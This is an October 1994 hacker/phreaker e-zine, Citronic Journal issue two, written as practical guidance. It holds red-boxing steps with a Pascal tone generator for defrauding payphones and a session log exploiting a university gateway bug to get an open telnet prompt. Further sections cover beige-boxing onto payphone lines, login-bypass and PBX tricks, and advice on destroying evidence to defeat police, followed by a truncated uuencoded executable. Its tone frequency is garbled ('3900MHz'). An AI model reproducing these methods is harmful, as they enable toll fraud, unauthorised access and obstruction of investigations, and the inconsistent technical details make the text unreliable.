        ,--------.

        |        |  __                                   __

        |   ,----' |__| ,--.                            |__|

        |   |           |  |_

        |   |      ,--. |    |  ,--.--. ,-----. ,-----. ,--. ,-----.

        |   |      |  | |  ,-'  |   __, | ,-. | | ,-. | |  | | ,---'

        |   `----. |  | |  |    |  |    | | | | | | | | |  | | |

        |        | |  | |  +--. |  |    | `-' | | | | | |  | | +---.

        `--------' `--' `-----' `--'    `-----' `-' `-' `--' `-----'

                               October '94



        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

      XXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

    XXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXX

   XXXXXXXXXXXXXX  XX      XX  XX  XX X   XX      XX       XX  XXXXXXXX

   XXXXXXXXXXXXXX  XX  XX  XX  XX  XX  XXXXX  XX  XX  XXX  XX  XXXXXXXX

    XXXXXXXXXXXXX  XX  XX  XX  XX  XX  XXXXX  XX  XX  XXX  XX  XXXXXXX

      XXXXXX      XXX      XX      XX  XXXXX  XX  XX        X     XXX

        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

                                Number Two



               Citronic Journal is a 'Cyberpunk' Free Zone

          Citronic Journal holds the British Standards Kite Mark



  ir0i - Citronic - ir0i - Citronic - ir0i - Citronic - ir0i

   

              ---->     |-|ar|)c0r3 T3cH|\|0pHi11iAcZ     <----



        +--------------------------Contents-------------------------+

        |                                                           |

        | 1) Messages from Dah Krew                                 |

        | 2) Rumourz n' Info                                        |

        | 3) Red Boxing - The Canadian Way    **** by SparHawk ***  |

        | 4) JANET <--> Telnet Gatewayz                             |

        | 5) Notes on Beige Boxing                                  |

        | 6) Inwardly Boxable UK Chatline     **** by SaintHalo *** |

        | 7) Prosecution Security                                   |

        | 8) Hacking Answering Machines                             |

        | 9) Dah Last Bit                                           |

        |                                                           |

        +-----------------------------------------------------------+





                    "Switch On - Jack In - Phreak Out"



   "The FBI can do nothing in cases of oral-genital intimacy unless it

              affects interstate commerce" - J. Edgar Hoover



  ir0i - Citronic - ir0i - Citronic - ir0i - Citronic - ir0i



an119774@anon.penet.fi   an119774@anon.penet.fi   an119774@anon.penet.fi 



                                 |)izc1aim3r

                                 ~~~~~~~~~~~

        If anyone does any of the stuff mentioned in this file there is 

a possibility of getting busted and being put in jail forever. If this 

happens don't come whining to us 'cos we'll deny everything and act real 

innocent. Also any meteorite hits on planet Earth are nothing to do with 

us. Everything in here is for informational purposes only and anything 

carried out is entirely at your own risk.



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+



                          Messages from Dah Krew

                          ~~~~~~~~~~~~~~~~~~~~~~



First of all Citronic iz:



HarLeQuin       - Dah G0DfaTher

Grim Reefer     - Dah N0vEl NeT SurFeR

Pulse           - Dah Cellular hItDeWd

Nosferatu       - Dah MiDniGhT f0x

SparHawk        - Dah Inf0 WhIrlwiNd

SaintHalo       - Dah DaTa FlAsHfL00d

CyberSpacePyr8  - Dah RAMrAideR pHr0m hELl



HarLeQuin sayz:



        Well here we are again with the second issue of Citronic

Journal. And once more it's time for my bitch-at-the-computer-

underground.

        The computer underground is supposedly based on freedom of

information. This is crap. The computer underground, like the rest of the

world is based on money and status. For example, h/p BBS's that only

allow you to connect at 9600bps or above. An excellent example of

information elitism. 9600bps modems can be bought second hand in the UK

for about 50 pounds, which I admit is not particularly expensive.

However, for your average 16 year old phreak/hack this IS expensive,

very expensive. So the BBS's represent freedom of information for rich

boys and girls who get money from their parents. Also all this crap

about 'machine elitism', like 'Amigas are shit, I have a Pentium,

they're eleet' - again bullshit. Since most hacking is done on a

terminal, a 8088 with a mono monitor is sufficient, but of course unless

you've got money - your a lAm3r right ?

        Then there is status. How many times have you heard on IRC 'Fuq 

0fF s00pErHaq U R lAm3 !' This hypocrisy is exactly what the computer 

underground is *supposedly* against. Keeping information to your close 

ring of friends, only the people you think are 'eleet'. Hmmmm, isn't 

this what Corps and Governments do all the time. Only giving information 

to those deemed privilidged enough to have it. If information is for 

everyone then regardless of what you think of a particular person, they 

have a right to have that information. Then again, if you deny that you 

are for 'freedom of information' you are no more than a common thief, 

stealing net access, online time, and credit. If you are happy with 

doing this, fine. But please, don't spout this bullshit about 

'information is for everyone', we know you're talking shit.

        I do not like nor condone the 'eleet', this does not mean I do

not respect peoples technical ability. If they are a great hacker or

phreak, this is due to their hardwork, talent and dedication. I respect

this and I am in awe of their ability. However, being banned from BBS's

and IRC channels just because you're not with the 'in' crowd is

hypocrisy we could all do without. In my experience all the great

hackers and phreaks I know (and I do NOT count myself among them) do not

shoot their mouths off, do not slag other people off, and are always

prepared to help the hack or phreak who is a begginer or who does not

understand a particular concept. 

        For example, on the #hack channel, someone came on and said 'Hey 

I've found a way to fake mail from root on my unix net !!!'. The reply

they got was to be kicked and banned. 0K, so its very simple, this does

not mean they are lame, it means they have some learning to do. The

people who think they can prove how 'eleet' they are by shitting on the

newbies are doing nothing except proving they are wankers and stiffling

the future of the underground.



        On a lighter note, I have had alot of positive support both for

Citronic and the Citronic Journal. Thanks guyz and galz. We do

appreciate it ! 



        At the moment many of the articles are UK based. This is mainly 

because I write nearly all of them. Hopefully the info will still be 

useful to ya or if not, an insight into the UK scene. So, if ya want 

some articles specific to your either

a) Write one or

b) Get some-one you know to write one.

I would appreciate a wide variety of articles, so get round to writing

them. We'll clean up the grammar/english/whatever. So get tapping.

Although I am happy to keep writing articles my knowledge and

creativeness are not endless, so the journals will either become very

short or very repetative. Anything will be appreciated !



        Sadly Pr0d1gY has left us. On a friendly note though, he's been

busted one too many timez and feels he can do without the hassle. Not

that I can blame him. However, we welcome SaintHalo and CyberSpacePyr8

who are both serious h4rDc0rE h/p hItdEwdZ...



        I have now joined the ranks of the CyberTrendies and have 

aqcuired a cellfone (not connected mind you). A Nokia 101, I have the 

access code and can change the NAMs and stuff, but if any1 has any 

programming software or programming leads for it... give me a mail ! 



My Helloz for this issue are as follows:-



  BadS - Meeko - Phantasm - AlfiWalf - Mini-Master - Maelstrom - BooYaa

                            "Dah UK H/P Mafia"



                     CyntaxEra - cF - Radikahl- Lapse

                    "International DewdZ - H/P Mafia"



                    King_Dan - Aladar - Xalopp - Ruede

                        "Virii Dewdz in Yer Face"

                          "(and in yer c0de !)"

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+



                             Rumourz n' Info

                             ~~~~~~~~~~~~~~~



        This is a new and I hope regular feature of the Citronic 

Journal. Basically rumours are part and parcel of the computer 

underground. 50% are usually true and 50% are usually completly false. 

But if we publish all that we hear it'll give you something to work on ! 



o There is a way to box global from the UK

This is not a rumour. This is actually true. But the people who know are 

keeping their mouths shut. The rumours on this subject are as follows : 

         The breaks are non-standard. It uses R2. It uses CCITT5.

Well, non-standard breaks seem feasable. But I have heard two different 

things about the signalling system. I called Yugoslavia direct (Yugo 

uses R2) and said "I am a BT engineer etc etc. We have had trouble with 

some of our lines have you had anyone phone up and as soon as you 

answered have the line go dead on you, possibly after a short tone... ?" 

Basically the operator answered, "Yes, we have had lots of 'kids' 

phoning up for a joke recently and then putting the phone down". Also I 

know of a Mexican guy who uses R2 to box global of Yugoslavia... Hmmmm, 

anyone cracking this one gets a big pat on the back from me. I've tried 

and am still trying with no bloody luck !



o Most PBX's have a direct dial number that gives you a dial tone 

instantly and lets you simply dial an extension without all the 'Welcome 

to Super Corp' messages... Also on most of them you can dial 9 (after 

getting the direct line) and get an outside line, letting you dial out. 

This was told to me by a person who works for a private 

telecommunications company and writes software for VMBs/PBXs



o HarLeQuin is stunning in bed and is wanted by women around the world.

Again, this is not rumour, it is 100% true. I swear. Honest :-)



o There is a bug in a version of linux that lets you log in as -froot or 

as -fguest and logs you in as root or guest respectively (no passwd 

needed). I haven't really tried this much, only on about two systems, so 

whether these were patched or not I don't know. I am inclined to think 

this is false, but if anyone knows otherwise....



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+



                @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

                @    ReD BoXiNG -                        @

                @              THe CaNaDiaN WaY          @

                @                          BY SPaRHaWK   @

                @                                        @

                @     Oh yeah... That Canadian guy...    @

                @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



        y0y0y0! Spar's here with his phreaking tips from up north! 

Today's topic boys and girls, is red boxing the welfare way. Since 

Hallmark Inc. is too 31337 to produce their digitally recordable 

greeting cards in Canada, and I'm basically too lazy and too dangerous 

with a soldering iron, and I'm not even going to THINK about handling 3. 

xxxxxxxxxxxx crystalz, I do all MY red boxing with a sturdy 5 year old 

Sony Walkman.



        And if you're from the USofA and you're reading this, the tonez 

aren't fer you... I've heard from everybody on #phreak that it doesn't 

work there anymore, kiddies! Too bad. If you find out how to do it there 

mail me- sparhawk@aladar.pmmf.hu.



        Anyway, basically what you need is a walkman, a cassette (the 

higher quality the better, although it probably doesn't matter too 

much), a tape recorder that you can record the tonez with, a sound card, 

and a brain size _slighty_ larger than Stimpy.



        The basic theory of red boxing is this: When you drop a quarter 

in the slot, on some phones you can hear a tone being made... Its a 

series of high pitched beeps. This signals to the Telco that the person 

at the phone has just dropped a quarter in. Hence, what a red box does 

is produce that tone.



        The tone for 5 cents is 3900MHz played for 35 milliseconds. So 

if we want a quarter, we make five of those tonez at 35 millisecond 

intervals. So what it looks like is this:



         BEEP____BEEP____BEEP____BEEP____BEEP

         <35><35><35><35><35><35><35><35><35>



        But it sounds more like bebebebebe. The human brain receives 

this information very fast, so when Zircon and I made it for the first 

time, we were going to do it over because we thought we only heard 4 

beeps. Trust me, there are five. I will include a TP program to do this 

over a PC Speaker at the end of this... Look in Phrack XX for a 

REDBOX.EXE for Adlib.



        Make sure to record about $7 or $10 worth. Remember that the 

more you record the less you have to rewind.



        Once we have this on tape, we stroll along to the nearest 

payphone and dial 1-902-YOU-WISH. We wait for the operator to come on 

saying: Please deposit $2552.46 for the first minute. Then we put the 

earphone of the walkman right on the speaker, have the volume up to 

full, and press play. We count the quarters until we have enough, and if 

the operator says something like "I asked for $4.56 and you deposited $4.

75. Do you want your money back to start over?" just say something like 

no, you're in a hurry, just put me through... And then your call should 

be put through.



        One major drawback of this method that we discovered is that you 

have to make the call operator assisted or it doesn't work. The variance 

in the walkman is too great to fool the machine. You _can_ do local 

calls but you have to dial the operator and say something like the 

keypad is a bit sticky, could you please dial the call for me. That's my 

line, so try and think of something original. =)



        You could probably do one that produces the tonez exactly by 

building an actual red box with the crystals and whatever, but I'm too 

lazy and non-inclined with a soldering iron to do it. =) 



( u 0n #P|-||234/<  !!!!!



REDBOX.PAS:

----------------------------Cut-Here-----------------------------------------



uses crt;

var i:integer;

begin

 for i:=1 to 5 do begin

  sound (3900);

  delay (35);

  nosound;

  delay(35);

 end;

end.



----------------------------Cut-Here-----------------------------------------



        I haven't tried it yet, but the tonez will brobably work if you

produce them with a PC Speaker because that is what the speaker is made for:

Producing accurate tones. If you try this and it works, mail me at the

address above.





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+



                         JANET to telnet gateway

                         ~~~~~~~~~~~~~~~~~~~~~~~

+------+

| NOTE |

+------+



        The menu system has been upgraded at this site. However, the bug

has not been fixed, so the same menu options still apply and this bug

will still drop you to a telnet> prompt as of 1.00pm 27th Sept '94.



History and Dialups

-------------------

        JANET is an acronym for the Joint Academic NETwork. It was the

original internetesqe network that has been around for many years

linking british 'higher education establishments'. The original JANET

runs at 9600bps (ack) although the introduction of SuperJANET means

massive increases in speed to near Novel data transfer speeds. However,

not all .ac.uk sites have SuperJANET installed...

        The advantage of using JANET as opposed to telnet is that after 

going through a certain number of JANET gateways, the call cannot be 

traced to the originating site. Also many British universities have 

JANET dialups where you can dial-in anonymously and get JANET access.

        Almost every university that has JANET access has a dialup

number, there are lots of them, but I'll list a few below.



Heriot-Watt University (in Edinburgh)                   0314 495941

Strathclyde University (in Glasgow)                     0415 228467

Bath Uni                                                0225 448898

Durham Uni                                              0913 742832

Leeds                                                   0532 461514



NOTE: Not all dialups will allow you to call JANET sites by name, or

they may only allow restricted access. The dialup I usually use only

allow 40 or so named servers to be called. However calling them with

there JANET X29 address usually bypasses this. If you don't know the X29

address of a site calling nott.info or on inter telnetting to 

info.nott.ac.uk will give you a lookup facility, so you can enter the

site name and it will provide you with its X29 address...



Gateways

--------

        There are other ways to get telnet from JANET.... Calling the

NISS service will provide you with a guest telnet prompt. However,

everything going thru here *is* logged. I know this for a fact. Also it

prevents you from calling .uk telnet sites. Although it will permit you

to call some them if you use only the IP number rather than the host

name.

        The Birmingham site also provides a guest telnet service (log in

as telgate) but this is undoubtably logged. Part of the JANET

regulations state that all gateways must have the *ability* to log all

data going thru them or not. It would be safe to assume this happens at

bham.acsis

        The Birmingham site however has a bug in its software that drops

the user to a telnet prompt when it fails to connect to a gopher site.

The log below is the process of how to get the prompt. All lines

starting with /* and ending with */ are my comments....

        To get to JANET from the internet, you can telnet to 

acsis.bham.ac.uk and log in as x29gate. Although almost all universities

are internet connected, JANET is still phun to play with :)



/* to call via JANET either use its site name or PAD> address...*/



PAD>call bham.acsis



/* or ...*/



PAD>call n000020060300



/* or you can telnet to acsis.bham.ac.uk */



Calling Name Server 

Connecting...

Connected

*******************************************************************************
*                                                                             *
*                         W E L C O M E   t o   T H E                         *
*               U N I V E R S I T Y   o f   B I R M I N G H A M               *
*             A C A D E M I C   C O M P U T I N G   S E R V I C E             *
*                    I N F O R M A T I O N   G A T E W A Y                    *
*                                                                             *
*                  acsis - ACSIS System                                       *
*                    cis - Campus Information Service                         *
*                 gopher - Gopher Client                                      *
*                jughead - The Birmingham Jughead Server                      *
*                   lynx - World-Wide Web Line Mode Browser                   *
*                 mosaic - World-Wide Web Window Browser                      *
*               newsread - Gopher News Reader                                 *
*                 status - Status of ACS Hosts and Networks                   *
*                telgate - Telnet Service for X29 PAD and Gandalf Users       *
*               veronica - University of Manchester Veronica Server           *
*                x29gate - X29 Service for Telnet Users                       *
*                                                                             *
*    Please login using the service name required. No password is needed.     *
*    Type clear if you need to clear the call to the Information Gateway.     *
*******************************************************************************
login: gopher


/* Note the amount of useful stuff on the menu :)) */





      Connecting to the Gopher System



        at The University of Birmingham, UK.











You will need to specify which Gopher Server you wish to connect to.

[Hit RETURN for the Birmingham Gopher Server; Q to quit.]



Please enter IP Name of Gopher Server: 



/* Press [RETURN] for the default server */



Receiving Directory...         



Internet Gopher Information Client v1.03



University of Birmingham Academic Computing Service



-->  1.  About the Birmingham University Gopher.

     2.  Campus Information Service at Birmingham University/

     3.  Usenet News Reader/

     4.  Other Birmingham Information Sources/

     5.  UK Gopher Servers/

     6.  Some World Wide Gopher Servers/

     7.  Koos Van Den Hout's Interesting Gopher Links/

     8.  University of Minnesota (World Wide Root Server)/

     9.  Swedish University Computer Network (European Root Server)/

     10. Finding Gopher Resources/

     11. Gopher Searching Facilities/

     12. Campus Wide Information Servers & Library OPACS/

     13. Internet Finger Servers/

     14. Other Internet Facilities/

     15. All the World's Gopher Servers/

     16. School Gophers/

     17. BTs Electronic Yellow Pages <TEL>

     18. X.500 Gopher Gateway/



Press ? for Help, q to Quit,u to go up a menu 



/* At this point choose menu option 14 */



Move To Line:14
   
Other Internet Facilities



-->  1.  Hytelnet Server [Login as hytelnet] <TEL>

     2.  InterNIC/

     3.  Internet Chess Server <TEL>

     4.  NetFind Service <TEL>

     5.  UK Archie Server <TEL>

     6.  WAIS Based Information/

     7.  World-Wide Web [Login as lynx] <TEL>


Press ? for Help, q to Quit,u to go up a menu 



/* At this point choose menu option 3 */



Move To Line:3




Warning!!!!!, you are about to leave the Internet

Gopher program and connect to another host.

If you get stuck press the control key and the ] key,

and then type quit



Now connecting to valkyries.andrew.cmu.edu

Press return to connect, q to cancel:


telnet: Unknown host valkyries.andrew.cmu.edu

telnet> 



/* Boom, you are dropped to a telnet prompt. */



        I have used this for several months with no problems. 90% of the

time it works, sometimes it will hang at the 

Press return to connect, q to cancel:

prompt after you have pressed return. But usually waiting a while will

result in a telnet prompt.


        0K ? Good, have phun with this and remember. I didn't say traffic

isn't logged through here, it's just less likely to be...  But they 'aint

got me yet :-))) Mwuahahahaha



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+



                          Notes on Beige Boxing

                          ~~~~~~~~~~~~~~~~~~~~~

        I've been messing around with beige boxing and the like recently

so here's just a few notes that might help ya out. The best file/s I have

found on beige boxing were in CoTNO, so check out Field Phreaking I & II

in CoTNO Issue #1 it's excellent.



Beige Boxing off BT Payphones

-----------------------------

        Most lines coming out of telephone boxes go underground

(especially the newer steel and glass phoneboxes) however with the older

red phoneboxes the line often leaves as a cable, perhaps leading up a

telegraph pole. This is especially true in small villages and more rural

areas. This is what you want to clip your modified phone onto.

        After attaching your phone to the line, it ceases to have the

same restrictions on it as dialing from the payphone would have. For

example, you can call the BT test numbers, such as 174, 176.

        I would recommend hanging the payphone up while beiging off its

line, as lifting the reciever causes a nasty buzz on the line. Also the

payphone ceases to function, although you can hear the conversation you

cannot speak thru the payphone handset speaker.

        I have built a gold box (a diverter, sometimes called a Cheese

box) which I have yet to try, but I'll report on if it worked probably

in the next issue if I get round to it...



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+



                       INWARDLY BOXABLE UK CHATLINE

                       ~~~~~~~~ ~~~~~~~ ~~ ~~~~~~~~





   There is a new chatline fer aLL u cuNtz who st!LL dont know, hehe. It

   is sited in Trinidad, Jamaica. Here :





                     [0800 899 843]  KP2-59211010-ST

   



   Unfortunately it is *total* crap as there are no real phreaks using it

   and u wiLL get kicked off every 10 mins, but weLL its nice 2 know it's

   there... 



   [ N.B. !F w3 caN GeT sUm PhrEAkz 0n iT, tHeN iT w0n'T b3 cRaP !!

     s0 AlL y00 UK PhrEaKz - geT b0xIn' AnD taLkinG !!  - Harl     ]



   I wiLL be setting up an InterNet H+P site in the UK in the next month 

   or so, if u are interested in helping me out then mail 

   an107853@anon.penet.fi. 



   Ta.



   .sainthalo. 

 

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+



                           Prosecution Security

                           ~~~~~~~~~~~~~~~~~~~~



        After talking about the recent busts with various hacks and

phreaks it seems to me that if the police or feds did make a casual

visit to your trusty hard-disk you would be buggered. The only way the

police can prosecute you is if they have *evidence* which most h/p dewdz

leave liberally scattered around there hard-drive and floppies. The

simple answer to this is:

a) Completely destroy unwanted files

b) All dodgy files that are stored must be PGPed with a 1024bit key and

   a long pass phrase.

This effectiveley means if your data is visited by the cops, you will 

have no trace of anything dodgy and everything else will be PGPed (and 

you won't tell them the pass phrase - 'cos you've forgotten it). This 

means, when you get some new h/p WaReZ and unpack the archive, shred the 

unpacked files afterwards and store the archive as a PGPed file. When I 

mean shred I mean completely overwritten (at least 3 times) and the file 

renamed to something like XYXYXYX.XYX, then deleted.

        To this end I have included a very simple file shredder I 

knocked up (for MS-DOS). It only took me 10 mins or so and therefore is 

quite basic but will serve its purpose. Any half decent k0der with a 

half hour or so should be able to come up with something more effecient 

and effective. 

        I personally use SHRED.EXE that is packaged (or used to be 

packaged with) Dr. Solomon's Anti-Virus Toolkit. Norton also do very 

good utilities that can shred disks as well as files. 



                             -*- REMEMBER -*-

                     'If you can't be good be careful

    If you can't be careful - develop a liking for bars and 7x4 rooms'





------------------- CUT HERE -----------------

section 1 of uuencode 5.15 of file shred.exe    by R.E.M.



begin 644 shred.exe

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

